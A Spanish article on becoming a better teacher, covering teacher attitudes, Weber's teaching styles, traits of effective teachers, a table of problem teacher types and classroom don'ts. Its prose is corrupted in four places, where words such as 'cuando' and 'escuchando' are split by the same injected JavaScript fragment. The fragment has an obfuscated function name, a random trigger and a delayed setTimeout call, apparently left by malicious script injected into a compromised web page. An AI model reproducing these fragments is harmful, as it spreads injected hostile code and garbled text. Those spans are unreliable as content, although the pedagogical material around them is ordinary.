CÓMO PODEMOS SER MEJORES DOCENTES

Autora: Beatriz Berrecosa Pérez

El objetivo de este artículo es conocer algunas técnicas que nos ayuden a mejorar como docentes. Además, se incluyen una serie de recomendaciones que deberíamos llevar a cabo para evitar situaciones que influyan negativamente en el proceso de enseñanza-aprendiza y en la relación profesor-alumno. También se analizan los diferentes estilos de profesores que existen y su modelo educacional. Por último, se adjunta una tabla gráfica con posibles problemas que puedan surgir y las acciones que se deberían realizar para solucionarlas.

Es evidente que tanto las actitudes como las aptitudes que posean los docentes van a ser un elemento fundamental para conseguir los objetivos planteados en el proceso pedagógico.

El conocimiento de la materia que debe impartir el profesor es algo necesario, aunque no suficiente, ya que también hay que tener en cuenta su actitud con respecto a él, así como hacia sus alumnos. Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el comportamiento hacia ellos es negativo, se producen resultados desfavorables por varias causas:

-       los alumnos perciben que son poco valorados y pueden desmotivarse con facilidad

-       el profesor no está motivado y, en consecuencia, su esfuerzo es menor.

Con respecto a las aptitudes, deben citarse algunos aspectos importantes a tener en cuenta:

-       el profesor debe saber moverse de manera adecuada en el aula, para evitar la monotonía

-       reforzamiento de su discurso verbal con apoyos no verbales

-       tono y volumen de voz ajustados

-       controlar el tiempo que se dedica a las pausas

Además, sería conveniente que el docente se autoevaluara con la intención de poder mejorar los posibles errores que se hayan cometido durante el proceso pedagógico.

Un concepto que sería importante definir en este punto es el de “empatía”, que es la capacidad de identificarse mental y afectivamente con el estado de ánimo de otro. Un profesor que posea esta cualidad será capaz de adaptarse con mayor facilidad a cada tipo de alumnado y de esta manera, elegir el método pedagógico más adecuado para cada situación y grupo.

Según Weber, los estilos de educación seguidos por los profesores se clasifican en:

a)    Autoritario: es cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el profesor se limita únicamente a proporcionar información y los alumnos solo deben escuchar y anotar lo que el docente explica.

b)    Democrático-liberal: el papel del profesor dentro del aula es menor con el fin de conseguir una mayor participación del alumnado.

c)    Democrático: el rol de los alumnos es eminentemente activo, y la relación entre ellos y el profesor es de igual a igual.

d)    Autogestionario: el docente facilita que el proceso de enseñanza-aprendizaje para que los alumnos fijen los objetivos que se pretenden conseguir, expongan los temas en el aula, etc.

e)    “Dejar hacer”: el profesor adopta una actitud pasiva y los alumnos son los que lo hacen todo. Puede resultar un estilo de educación peligroso si el grupo de alumnos no es lo suficientemente maduro.

Las principales características de los profesores que optimizan los resultados son:

-       conoce el contenido y lo actualiza periódicamente con asistencia a congresos y seminarios, participandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando en publicaciones, etc.

-       Si se equivoca lo reconoce sin poner excusas

-       Antes de empezar la clase, comprueba que los medios que va a utilizar durante su sesión funcionan correctamente (ordenador, proyector, etc.).

-       Con respecto a los alumnos los aprecia y los respeta y trabaja continuamente el feed-back

-       Tiene vocación de enseñar y aprender

-       Motiva a los alumnos

-       Controla la comunicación verbal y no verbal

-       Después de la clase evalúa cómo ha ido para mejorar en los aspectos que ha fallado.

Sin embargo, no todos los docentes llevan a cabo sus clases con éxito. Hay veces que surgen problemas y, por eso, en el siguiente cuadro podemos ver las acciones que podemos realizar:

TIPOLOGÍA PROBLEMA ACCIÓN A REALIZAR

ENEMIGO

Infravalora a sus alumnos Verificar las cualidades positivas de los alumnos

FALTA DE BASE

No conoce el contenido Preparar mejor las sesiones

PAYASO

Exceso de bromas debido a sus carencias de contenido Dosificar las bromas y suplir las carencias del contenido

EGOCÉNTRICO

No piensa en los intereses de los alumnos Intentar que el centro de interés sean los alumnos

SABIO

Demuestra que él sabe mucho Preocuparse más por aprender en vez de por enseñar

NERVIOSO

Actúa por debajo de sus posibilidades debido a la inseguridad Grabarse en vídeo, prepararse mejor el contenido, etc.

Para terminar, existen una serie de recomendaciones sobre las cosas que un profesor NO debe hacer en clase:

-       empezar lo clase si la mayoría no está escuchandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando y atendiendo

-       no utilizar un lenguaje adaptado al nivel del alumnado

-       tener un ritmo lento o excesivamente rápido

-       no valorar a los alumnos

-       criticar a un alumno en público. Cualquier apreciación debe hacerse en privado y personalmente a la persona implicada

-       herir sentimientos de los alumnos en cualquier ámbito, ya sea politico, religioso o moral.

Bibliografía

-       Amat, O. Aprender a enseñar. Gestión 2000. Barcelona, 2005.

-       Weber, E. Estilos de educación. Herder. Barcelona, 1976

Webgrafía

www.rae.es

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.